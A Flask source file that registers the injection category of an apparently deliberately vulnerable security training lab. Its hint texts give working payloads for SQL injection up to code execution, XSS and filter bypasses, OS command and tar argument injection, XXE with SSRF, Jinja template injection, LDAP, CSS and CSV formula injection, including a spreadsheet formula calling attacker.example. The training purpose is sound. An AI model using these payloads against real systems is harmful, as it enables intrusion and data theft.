from flask import Blueprint

a03_bp = Blueprint(
    "a03_injection", __name__, template_folder="templates", url_prefix="/a03"
)

from app.categories.a03_injection import routes  # noqa: E402,F401
from app.categories.a03_injection.seed import seed_injection_data  # noqa: E402
from app.core.nav import CATEGORIES, CategoryNav, ExampleNav  # noqa: E402

CATEGORIES.append(
    CategoryNav(
        id="a03_injection",
        short_id="A03",
        title="Injection",
        blurb="Untrusted input executed by an interpreter, such as SQL, a shell, or the browser, instead of being treated as data.",
        blueprint_name="a03_injection",
        overview_endpoint="a03_injection.overview",
        examples=[
            ExampleNav(
                id="sqli-login",
                title="Authentication Bypass via SQL Injection",
                group="SQL Injection",
                difficulty="Easy",
                endpoint="a03_injection.login",
                hints=[
                    "This login form builds its database query by directly inserting your username and password into a SQL string. What happens if one of those fields contains a character that has special meaning in SQL, like a quote?",
                    "The query looks roughly like: SELECT * FROM injection_accounts WHERE username = '<your username>' AND password = '<your password>'. A single quote in your input breaks out of that string literal early.",
                    "Log in with username admin'-- and any password (or leave the password field blank) — the -- comments out the rest of the query, including the password check, logging you in as admin without ever knowing the real password.",
                ],
            ),
            ExampleNav(
                id="union-exfiltration",
                title="UNION-Based SQL Injection Data Exfiltration",
                group="SQL Injection",
                difficulty="Medium",
                endpoint="a03_injection.search",
                hints=[
                    "This search box also builds SQL by directly inserting your search term. Once you've broken out of the surrounding string literal, is there a SQL keyword that lets you attach results from a completely different query?",
                    "The underlying query always returns exactly two columns (id, username). UNION SELECT lets you attach a second SELECT with the same column count and shape, pulling rows from any table the database can see.",
                    "First confirm the injection point: search for a lone single quote and check for a database error.",
                    "Then search for: ' UNION SELECT id, value FROM a03_secrets -- — the results table now shows rows from a03_secrets, a table this search box was never meant to expose. The same technique reaches injection_accounts itself for real usernames and passwords.",
                ],
            ),
            ExampleNav(
                id="roster-sort",
                title="Employee Roster Sort (ORDER BY Injection)",
                group="SQL Injection",
                difficulty="Medium",
                endpoint="a03_injection.roster",
                hints=[
                    "The employee roster can be sorted by column, and the column name comes straight from a URL parameter. ORDER BY targets are trickier to inject than a normal WHERE-clause value — think about why the usual quote-breakout trick doesn't directly apply here.",
                    "Since the sort value is inserted as a raw SQL expression rather than a quoted string, you don't need to break out of anything — any valid SQL expression can go there directly, as long as it's legal in an ORDER BY position.",
                    "Try ?sort=(CASE WHEN (1=1) THEN name ELSE email END) — a full conditional expression works fine as a sort target, proving arbitrary SQL executes there, not just a bare column name.",
                    "For real information disclosure, make the CASE condition depend on hidden data, e.g. (CASE WHEN (some condition about a secret) THEN name ELSE id END) — the resulting row order changes depending on whether the condition is true, letting you extract data one true/false answer at a time through the sort order instead of a WHERE clause.",
                ],
            ),
            ExampleNav(
                id="error-based-sqli",
                title="Error-Based SQL Injection via Product Lookup",
                group="SQL Injection",
                difficulty="Medium",
                endpoint="a03_injection.product_lookup",
                hints=[
                    "This product lookup takes a raw ID and, unusually, shows you the actual database error message when something goes wrong. What could that error text accidentally reveal?",
                    "Submit a lone single quote as the product ID and look closely at the error that comes back — the database is telling you something about the query it tried to run.",
                    "PostgreSQL raises a type-conversion error if you ask it to CAST a value that isn't a valid integer — and that error message includes the exact value it failed to convert.",
                    "Submit: 1 AND CAST((SELECT password FROM injection_accounts WHERE username='admin') AS int) > 0 — the CAST fails because a real password isn't numeric, and the resulting error message leaks that password's actual text.",
                ],
            ),
            ExampleNav(
                id="blind-sqli",
                title="Blind Time-Based SQL Injection",
                group="SQL Injection",
                difficulty="Hard",
                endpoint="a03_injection.check_username",
                hints=[
                    "This username-availability check never shows you any data — just 'available' or 'taken'. When there's nothing to read directly, what OTHER observable signal could a malicious query still produce?",
                    "PostgreSQL has a function that pauses query execution for a given number of seconds. If that delay is made conditional on something you want to know, the response TIME itself becomes the leaked signal.",
                    "Try: nobody' OR (SELECT 1 FROM pg_sleep(5))=1-- — if the page takes about 5 seconds to respond, you've confirmed both the injection point and the timing side-channel work.",
                    "Wrap the sleep in a conditional instead of an unconditional one: pg_sleep((SELECT CASE WHEN <condition> THEN 5 ELSE 0 END)) — a true condition delays the response, a false one returns immediately.",
                    "Extract data one character at a time by testing conditions like (SELECT substring(password,1,1) FROM injection_accounts WHERE username='admin')='s' inside that CASE — repeat for each position and each candidate character to reconstruct the admin password purely from response timing, with no data ever displayed on the page.",
                ],
            ),
            ExampleNav(
                id="roster-lookup",
                title="Employee Lookup (Numeric Blind Injection)",
                group="SQL Injection",
                difficulty="Hard",
                endpoint="a03_injection.roster_lookup",
                hints=[
                    "This lookup takes a numeric employee ID and only ever tells you found or not found. The ID isn't wrapped in quotes anywhere in the query — what does that change about how you'd break out of it?",
                    "Because the value is substituted as a raw number rather than inside a string literal, you don't need a quote to inject at all — any valid SQL expression that evaluates to a number (or a boolean, which SQL treats as 0/1) works directly in its place.",
                    "Try id=0 OR 1=1 — if 'found' flips to true even though employee 0 shouldn't exist, you've confirmed the whole WHERE clause is under your control, not just a literal ID value.",
                    "Turn this into a working oracle: id=0 OR (SELECT CASE WHEN <condition> THEN 1 ELSE 0 END)=1 — 'found' becomes true exactly when <condition> is true, a boolean-blind read with no timing required.",
                    "Substitute a real condition, e.g. id=0 OR (SELECT CASE WHEN (SELECT substring(password,1,1) FROM injection_accounts WHERE username='admin')='s' THEN 1 ELSE 0 END)=1 — repeat per character and position to extract the admin password one true/false answer at a time, purely from the found/not-found flag.",
                ],
            ),
            ExampleNav(
                id="sqli-to-rce",
                title="Advanced SQL Injection: From Detection to Remote Code Execution",
                group="SQL Injection",
                difficulty="Hard",
                endpoint="a03_injection.inventory_lookup",
                hints=[
                    "This inventory check takes a numeric SKU with no quotes involved, the same shape as the roster lookup. But this endpoint's database driver allows something most of the other examples don't — what happens if you put more than one SQL statement in the same input, separated by a semicolon?",
                    "Try id=0 OR 1=1 first to confirm the field reaches raw SQL, exactly like the roster lookup example. Then try appending a second, harmless statement after a semicolon, like 1; SELECT 1-- — if that doesn't error out, stacked multi-statement queries are genuinely accepted here.",
                    "PostgreSQL's COPY ... FROM PROGRAM command lets a sufficiently privileged database role run an arbitrary OS command and write its output into a table — and stacked queries mean you can inject that as a second statement right after your first one.",
                    "A safe way to prove code execution without opening any network connection: 1; DROP TABLE IF EXISTS a03_rce_check; CREATE TABLE a03_rce_check (output text); COPY a03_rce_check FROM PROGRAM 'id'; -- — then look up any SKU again and the database now holds this server's real id command output.",
                    "From there, the same COPY ... TO PROGRAM mechanism can pipe a reverse-shell command instead of a harmless one, turning the injection into a fully interactive shell on the database server — this final escalation step is manual, hands-on-keyboard exploitation only, matching this example's own Exploitation walkthrough (this lab's automated tests never attempt it).",
                ],
            ),
            ExampleNav(
                id="second-order-sqli-department-report",
                title="Second-Order SQL Injection via Department Report",
                group="SQL Injection",
                difficulty="Hard",
                endpoint="a03_injection.department_report",
                hints=[
                    "This form safely adds a new employee to the roster -- the write itself uses the ORM and is fully parameterized. Look instead at what happens to a stored department value LATER, in a completely different feature.",
                    "The department report loops over every distinct department already in the database and builds a NEW SQL query for each one via plain f-string interpolation -- request.form was never involved in that query at all, only data that already sat safely in the table.",
                    "Add a new employee with the department field set to: NoSuchDept' UNION SELECT username, password, 0 FROM injection_accounts-- . The write succeeds without any error -- this step is completely safe.",
                    "Now view the department report. The report route reads your stored department value back and interpolates it into a fresh query -- your payload breaks out of that query's string literal and the UNION SELECT fires, leaking every row of injection_accounts (real usernames and plaintext passwords) disguised as an employee list for a department that doesn't exist.",
                    "This is second-order SQL injection: parameterizing the WRITE (as this app correctly does here) provides zero protection against an unrelated, later feature that re-interpolates the same stored value into a brand new, unparameterized query.",
                ],
            ),
            ExampleNav(
                id="reflected-xss",
                title="Reflected XSS in Greeting Page",
                group="Cross-Site Scripting (XSS)",
                difficulty="Medium",
                endpoint="a03_injection.greet",
                hints=[
                    "This page builds a greeting from a URL query parameter and marks the result 'safe' before rendering it — think about what 'safe' means to a template engine, and what that implies about escaping.",
                    "Try putting a harmless HTML tag in the name parameter, like <b>test</b> — if it renders as bold instead of literal text, your input is being interpreted as markup, not escaped.",
                    "Since HTML renders, script tags should too. Submit ?name=<script>alert(document.cookie)</script> as the query string — the script executes immediately when the page loads, no clicking required beyond visiting the crafted URL.",
                ],
            ),
            ExampleNav(
                id="stored-xss",
                title="Stored XSS in Comments",
                group="Cross-Site Scripting (XSS)",
                difficulty="Hard",
                endpoint="a03_injection.comments",
                hints=[
                    "This comment form stores exactly what you type and shows it back to every future visitor — check whether the stored text goes through the same escaping-bypass trick as the reflected XSS example.",
                    "Post a comment with a harmless tag like <b>test</b> in the body. If it renders bold on reload instead of literal text, the stored comment is being rendered unescaped for everyone who views the page, not just you.",
                    "Post a comment with the body <script>alert('stored XSS')</script> — reload the page and the script fires immediately, with no link-clicking or social engineering needed, and it fires again for every future visitor until the lab is reset.",
                ],
            ),
            ExampleNav(
                id="filter-challenge",
                title="Filter Bypass Challenge",
                group="Cross-Site Scripting (XSS)",
                difficulty="Hard",
                endpoint="a03_injection.filter_challenge",
                hints=[
                    "Three separate filters are running here, and each one blocks the 'obvious' script-tag payload in a different way. Look at each filter's actual code — a naive filter's blind spot is usually a case it never considered, not a case it got wrong.",
                    "Level 1 only checks for the literal substring '<script'. Any other tag can carry executable JavaScript too — think about an <img> tag with a broken image source and an event handler.",
                    "Level 1 bypass: submit <img src=x onerror=console.log('LEVEL-1-BYPASS')>. Level 2 strips '<script>' and '</script>' as two separate one-time passes and never re-checks its own output afterward — what happens if you nest one script tag inside another so the stripped-out fragments recombine?",
                    "Level 2 bypass: submit <scr<script>ipt>console.log('LEVEL-2-BYPASS')</scr</script>ipt> — removing the inner tags leaves the outer fragments sitting next to each other, reconstituting a real <script> tag. Level 3 only escapes < and > — but its output is reflected inside an HTML attribute (value=\"...\"), where a bare quote is what actually breaks out, no angle brackets required.",
                    "Level 3 bypass: submit \" autofocus onfocus=\"console.log('LEVEL-3-BYPASS'). The lone double-quote closes the value=\"...\" attribute early; everything after becomes two new attributes on the same tag, and autofocus makes onfocus fire the instant the page loads.",
                ],
            ),
            ExampleNav(
                id="unicode-normalization-xss-bypass",
                title="Unicode Normalization Filter Bypass (XSS)",
                group="Cross-Site Scripting (XSS)",
                difficulty="Hard",
                endpoint="a03_injection.feedback",
                hints=[
                    "This feedback form genuinely blocks the literal substring '<script' before doing anything else. Confirm that first, then think about what happens to your text AFTER the filter approves it -- is it rendered exactly as submitted, or does something transform it first?",
                    "The app calls Python's unicodedata.normalize(\"NFKC\", ...) on approved text before rendering it, meant to tidy up fullwidth punctuation someone might paste in. NFKC normalization converts many 'compatibility' Unicode characters into their ordinary ASCII equivalents -- including fullwidth angle brackets.",
                    "Submit your feedback using the FULLWIDTH Unicode angle brackets U+FF1C (＜) and U+FF1E (＞) instead of ordinary '<'/'>': ＜script＞alert(document.domain)＜/script＞. The literal-substring filter finds no ordinary '<script' anywhere in this text and lets it straight through.",
                    "The normalization step that runs afterward converts each fullwidth character into its literal ASCII equivalent -- ＜ becomes < and ＞ becomes > -- reconstructing a real <script> tag from text the filter never recognized as dangerous, and it executes exactly as if you'd typed it in plain ASCII.",
                ],
            ),
            ExampleNav(
                id="filtered-host-lookup",
                title="Hostname Lookup Filter Bypass",
                group="OS Command Injection",
                difficulty="Medium",
                endpoint="a03_injection.filtered_host_lookup",
                hints=[
                    "This version blocks the obvious shell separators before running the command. Think about what OTHER characters a shell treats as a command separator that a blacklist author might forget.",
                    "The filter checks for semicolon, ampersand, and pipe. A literal newline character does the exact same job in /bin/sh — terminates one command and starts the next — and isn't on this list at all.",
                    "The input field is a textarea, so you can type a real newline. Submit localhost on one line and whoami on the next (in the same submission) — the filter lets it through since it never checks for a newline, and whoami's output appears in the response.",
                ],
            ),
            ExampleNav(
                id="command-injection",
                title="OS Command Injection in Host Lookup Tool",
                group="OS Command Injection",
                difficulty="Hard",
                endpoint="a03_injection.host_lookup",
                hints=[
                    "This 'hostname lookup' tool runs a shell command built directly from your input, with no filtering at all this time. What shell metacharacter lets you chain a second, completely different command onto the first?",
                    "Try appending a semicolon and a second command after a normal-looking hostname — /bin/sh treats everything after the semicolon as a brand-new command.",
                    "Submit localhost; whoami as the hostname — the output includes the result of whoami appended after the lookup, proving you've executed an arbitrary command on the server. $(id) also works via command substitution.",
                    "Once you've proven basic command execution works, this example's own Exploitation section goes further — it walks through escalating this exact injection point into a full interactive reverse shell using nc or bash's /dev/tcp, if you want to take it that far.",
                ],
            ),
            ExampleNav(
                id="blind-report-injection",
                title="Blind Command Injection via Report Generator",
                group="OS Command Injection",
                difficulty="Hard",
                endpoint="a03_injection.generate_report",
                hints=[
                    "This 'generate report' feature never shows you any output — success, failure, or anything else all look identical. When a page gives you zero visible signal, what OTHER property of an HTTP response can still leak information?",
                    "Submit an ordinary report name, then submit one designed to make a shell command pause for several seconds. If the SECOND request visibly takes longer to respond, you've found a timing side-channel with command execution behind it.",
                    "Confirm it: submit x; sleep 5 # as the report name. A ~5-second-slower response (compared to a normal report name) proves your input reaches a real shell — even though the page text itself never changes.",
                    "A timing oracle can answer yes/no questions about data you can't see, one bit at a time. To read the first byte of a secret file on the server, build a conditional sleep shaped like: x; [ $(printf %d \\'$(head -c1 /path/to/file)) -gt 128 ] && sleep 3 # — slow means the byte's value is above 128, instant means it isn't. Binary-search that range (halving each guess) and you'll pin down the exact byte in about 8 requests.",
                    "Doing that one byte at a time for an entire file by hand doesn't scale — this is exactly the kind of blind extraction that tools like commix automate: point it at this endpoint and it recovers a whole file unattended in a couple of minutes, the same technique as the manual binary search, just automated across every byte.",
                ],
            ),
            ExampleNav(
                id="argument-injection-tar-export",
                title="Argument Injection via Unsanitized tar Archive Export",
                group="OS Command Injection",
                difficulty="Hard",
                endpoint="a03_injection.export_archive",
                hints=[
                    "This 'back up your files' feature calls tar with shell=False and the list-argument form of subprocess.run() -- the exact fix this lab's OTHER command-injection examples point to. No shell metacharacter reaches a shell here. So what's left to attack?",
                    "shell=False stops shell METACHARACTERS from being interpreted -- it does nothing to validate the raw VALUE itself. Submit a filename starting with -- (e.g. --help) and see whether tar treats it as an option instead of a filename, even though it arrived as one plain Python list element with no shell involved at all.",
                    "GNU tar's --use-compress-program option lets you specify an arbitrary external program to run as the archive's 'compressor' -- and tar genuinely executes whatever string you give it. Submit exactly: --use-compress-program=sh -c \"id > /tmp/a03_argument_injection_proof.txt\"",
                    "The proof file's real contents (the actual output of id, executed on the server) appear immediately in the response to that same submission, proving genuine code execution through a field that was only ever supposed to accept a plain filename.",
                    "This isn't tar-specific: SonarSource's argument-injection-vectors catalog documents the same root cause across curl's -o, ssh's -oProxyCommand, psql's -o, and many other common CLI tools. Avoiding shell=True is necessary but never sufficient on its own -- every argument still needs its own validation.",
                ],
            ),
            ExampleNav(
                id="xml-import",
                title="XXE File Disclosure via Contact Import",
                group="XML External Entity Injection (XXE)",
                difficulty="Easy",
                endpoint="a03_injection.xml_import",
                hints=[
                    "This 'import a contact' feature parses whatever XML you upload. XML has a mechanism for declaring custom shorthand values ('entities') inside a <!DOCTYPE> block — some of those can point outside the document entirely, at a resource on the server's own filesystem.",
                    "Try declaring an entity whose value is file:///etc/hostname — a file every Linux system has and that's safe to read. If the imported 'name' shows the container's hostname instead of an error, external entity resolution is enabled and file contents are getting substituted into your document.",
                    "Submit this XML as the upload: <?xml version=\"1.0\"?><!DOCTYPE contact [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]><contact><name>&xxe;</name></contact> — the response shows the real file contents, since the parser expands your entity before extracting the <name> element's text.",
                ],
            ),
            ExampleNav(
                id="xxe-ssrf",
                title="XXE SSRF via Status Feed Importer",
                group="XML External Entity Injection (XXE)",
                difficulty="Hard",
                endpoint="a03_injection.xxe_ssrf",
                hints=[
                    "This 'status feed' importer has the same XML-entity-expansion flaw as the contact importer — but this time, think about what happens if the entity's SYSTEM identifier is a URL instead of a local file path.",
                    "The server has a health-check endpoint at /healthz that only makes sense to call from inside the server's own network. What if you could make the SERVER issue that request FOR you, through the XML parser?",
                    "Declare an entity pointing at http://127.0.0.1:5000/healthz and submit that XML as the status feed. If the response includes the exact body /healthz returns, the server itself just made an outbound HTTP request on your behalf: <!DOCTYPE status [<!ENTITY probe SYSTEM \"http://127.0.0.1:5000/healthz\">]><status><message>&probe;</message></status>",
                    "This is Server-Side Request Forgery reached through an XML parser: in a real deployment, the actual target of interest wouldn't be a harmless health check but an internal-only address like a cloud metadata service (e.g. 169.254.169.254 on AWS/GCP/Azure) — anything the server can reach on its internal network that an external attacker never could directly.",
                ],
            ),
            ExampleNav(
                id="ssti-email-preview",
                title="SSTI RCE via Custom Email Notification Preview",
                group="Server-Side Template Injection (SSTI)",
                difficulty="Easy",
                endpoint="a03_injection.email_preview",
                hints=[
                    "This 'preview my email' feature runs your typed greeting text through Flask's template renderer. Template engines don't just display text — they can evaluate expressions inside it. What syntax does Jinja use for an expression?",
                    "Try submitting {{ 7*7 }} as your greeting text. If the preview shows 49 instead of the literal text {{ 7*7 }}, your input is being evaluated as template code, not displayed as data.",
                    "Jinja templates have access to Python's object internals through attributes like self.__init__.__globals__. Chaining through those eventually reaches __builtins__, and from there __import__.",
                    "Submit this as your greeting text: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} — the preview shows the real output of the id command, executed on the server itself.",
                ],
            ),
            ExampleNav(
                id="ssti-blacklist-bypass",
                title="SSTI Blacklist Bypass via Profile Bio Preview",
                group="Server-Side Template Injection (SSTI)",
                difficulty="Hard",
                endpoint="a03_injection.bio_preview",
                hints=[
                    "This bio-preview feature has the exact same SSTI bug as the email-preview example, but it now checks your input against a list of forbidden words first. Confirm the underlying template-evaluation bug still exists with a payload that doesn't contain any blocked word at all.",
                    "{{ 7*7 }} contains none of the blocked words and still evaluates — the blacklist only blocks specific keywords, not the ability to run arbitrary template expressions.",
                    "The direct RCE payload from the email-preview example gets blocked because it literally contains the words os, import, and popen. Jinja has a string-concatenation operator, ~, that combines strings AT RENDER TIME, inside the expression itself — meaning the blocked words never appear as literal substrings in what you submit.",
                    "Build each blocked word from smaller pieces using ~, e.g. 'o'~'s' becomes the string \"os\" only once Jinja evaluates it. Submit: {{ self.__init__.__globals__.__builtins__['__imp'~'ort__']('o'~'s').__dict__['pop'~'en']('id').read() }} — the blacklist's substring check passes (none of the forbidden words appear literally), and the exact same command execution as the email-preview example happens.",
                ],
            ),
            ExampleNav(
                id="ldap-directory-login",
                title="LDAP Auth Bypass via Company Directory Login",
                group="LDAP Injection",
                difficulty="Easy",
                endpoint="a03_injection.directory_login",
                hints=[
                    "This login form builds an LDAP search filter directly from your username and password. LDAP filters have their own special characters, just like SQL has quotes — what does a bare asterisk mean inside one?",
                    "In LDAP filter syntax, * means 'any non-empty value', not a literal asterisk. Try logging in as a username you know exists (alice) with * as the password.",
                    "If that logs you in as alice without her real password, the filter is genuinely unescaped. Now aim higher: log in with username root_admin and password * — you're authenticated as the Root Administrator account, whose real password you never supplied, because the filter the server evaluates becomes '(&(uid=root_admin)(userPassword=*))' — match any entry with that uid that has SOME password set, which every real account does.",
                ],
            ),
            ExampleNav(
                id="ldap-directory-search",
                title="Blind LDAP Injection via Employee Directory Search",
                group="LDAP Injection",
                difficulty="Hard",
                endpoint="a03_injection.directory_search",
                hints=[
                    "This directory search never shows you the matched value — only whether a match was found at all. That's a single bit of signal per request, exactly like this lab's blind SQL injection example, just against LDAP instead of SQL.",
                    "The filter matches on the description field as a PREFIX (description=QUERY*). Try target=root_admin with query=r — a 'match found' result tells you root_admin's hidden description starts with the letter r.",
                    "Keep extending the query by one character at a time, trying every letter/digit at each new position — 're' still matches, 'rf' doesn't, so the second character is 'e', and so on. Each correct guess narrows the search by exactly one more confirmed character.",
                    "Repeating this character-by-character process recovers the entire hidden description value (a secret recovery code) purely from found/not-found responses, without the server ever showing you the value directly — slower than a direct leak, but fully automatable exactly like the blind SQLi technique elsewhere in this lab.",
                ],
            ),
            ExampleNav(
                id="css-attribute-exfil",
                title="CSS Attribute-Selector Data Exfiltration via Profile Theme",
                group="CSS Injection",
                difficulty="Hard",
                endpoint="a03_injection.theme_preview",
                hints=[
                    "This 'customize your profile theme' feature renders whatever CSS you submit straight into the page, and the same page happens to contain a hidden account_recovery_pin field. CSS isn't usually thought of as something an attacker can 'inject' the way SQL or JavaScript can -- but a browser's CSS engine genuinely evaluates the rules you give it, including rules that can trigger a real network request.",
                    "CSS has attribute selectors like input[value^=\"7\"], which match any element whose value attribute STARTS WITH \"7\". Pair a matching selector with a background-image rule, and the browser fetches that image URL the instant the selector matches -- turning a CSS rule into a signal an attacker-controlled server can observe. One catch: the PIN field is a hidden input (display:none), and browsers never fetch background-image for an element that isn't rendered, so the rule has to target a rendered SIBLING of the hidden input via the + combinator (input[...] + p { ... }) rather than the hidden input directly.",
                    "Open the live exfiltration demo linked from this page's Exploitation section: a sandboxed iframe (with JavaScript entirely disabled) renders the real hidden PIN alongside a CSS rule targeting the digit 7 via its rendered sibling paragraph. Reload the demo page after the iframe loads -- the leaked digit shows up in the 'Exfiltrated so far' list, proving the request fired for real, with zero script execution involved.",
                    "The collector endpoint (/a03/css-exfil-collector) that receives the leaked value has no authentication and never checks whether the value it's handed actually matches anything real -- it accepts and stores whatever arrives. That's the whole vulnerability: the channel itself is wide open, not just one specific CSS rule.",
                    "A real attacker doesn't know the PIN in advance. They inject ten rules at once -- one per candidate digit 0 through 9, each pointing at a differently-labeled collector URL -- and whichever request actually arrives reveals the correct first digit. Repeating this, extending the confirmed prefix by one digit each round, recovers the entire PIN purely from which background-image requests fire, exactly the same character-by-character oracle pattern as this lab's blind SQL and LDAP injection examples.",
                ],
            ),
            ExampleNav(
                id="csv-formula-injection",
                title="CSV Formula Injection via Comment Export",
                group="CSV Injection",
                difficulty="Medium",
                endpoint="a03_injection.csv_injection",
                hints=[
                    "This comment feature can export all comments to a CSV file for download -- a common real-world feature. Look at how each comment's author and body get written into that export: is there any check on what characters a cell is allowed to start with?",
                    "Spreadsheet applications like Excel and Google Sheets treat a cell starting with =, +, -, or @ as a FORMULA to evaluate the instant the file is opened, not as plain text. Post a comment with body =1+1, export the CSV, and open the raw file -- the cell contains the literal text =1+1 with no neutralizing prefix added.",
                    "Escalate from a harmless proof to real code execution: post a comment with body =cmd|'/C calc'!A0 (a Dynamic Data Exchange payload). Opened in a DDE-enabled version of Excel, this spawns Calculator the moment the victim accepts the workbook's external-data-update prompt.",
                    "Google Sheets has no such prompt to click through. Post a comment with body =IMPORTXML(\"http://attacker.example/track\", \"//a/@href\") -- viewing this cell in Google Sheets silently fires a real outbound HTTP request to the attacker's server, confirming the payload landed with zero user interaction beyond opening the file.",
                ],
            ),
            ExampleNav(
                id="file-inclusion-lfi-ssti",
                title="LFI-to-SSTI via Unsanitized Snippet Include",
                group="File Inclusion",
                difficulty="Hard",
                endpoint="a03_injection.file_inclusion",
                hints=[
                    "This 'custom snippet' feature saves text under a name you choose, and a separate feature reads a saved snippet back by that same name. Look at how the read side handles the name -- and what it does with the file's CONTENT once read.",
                    "Save a snippet named test with the content {{ 7*7 }}, then render it back by name. If the result shows 49 instead of the literal text {{ 7*7 }}, the file's content is being evaluated as a live Jinja template, not displayed as data.",
                    "Save a snippet containing the same SSTI payload chain used elsewhere in this category: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}. Render it back by name -- the real output of the id command comes back, proving genuine code execution through a feature that only ever looked like a text-storage tool.",
                    "The include path also has zero validation on the name parameter itself -- exactly like this app's Path Traversal examples. Try rendering a snippet 'name' that's actually a bare absolute path to a file that was never saved through this feature at all -- its real contents come back too, proving arbitrary file disclosure works completely independently of the code-execution angle above.",
                ],
            ),
            ExampleNav(
                id="svg-upload-stored-xss",
                title="Stored XSS via Untrusted SVG Upload",
                group="Insecure File Upload",
                difficulty="Hard",
                endpoint="a03_injection.upload_attachment",
                hints=[
                    "This 'upload an attachment' feature accepts any file at all -- check whether there's any restriction on file extension or content before it's saved.",
                    "Uploaded files are served back later via Flask's send_from_directory() with no override at all -- the file's own extension decides its Content-Type, exactly like any static file on the web.",
                    "Upload a file named poc.svg containing <svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.cookie)\"></svg>. It's accepted with zero validation.",
                    "Open the uploaded file's link directly (as its own page, not embedded in an <img> tag). The server serves it as image/svg+xml with no forced download -- your browser renders it as a real SVG document and the onload handler fires immediately.",
                    "This is persistent stored XSS with no template-escaping bug anywhere in sight: the vulnerability is entirely in trusting an uploaded file's own extension to decide how the browser interprets it, rather than in any HTML-rendering code path.",
                ],
            ),
        ],
        seed_fn=seed_injection_data,
    )
)
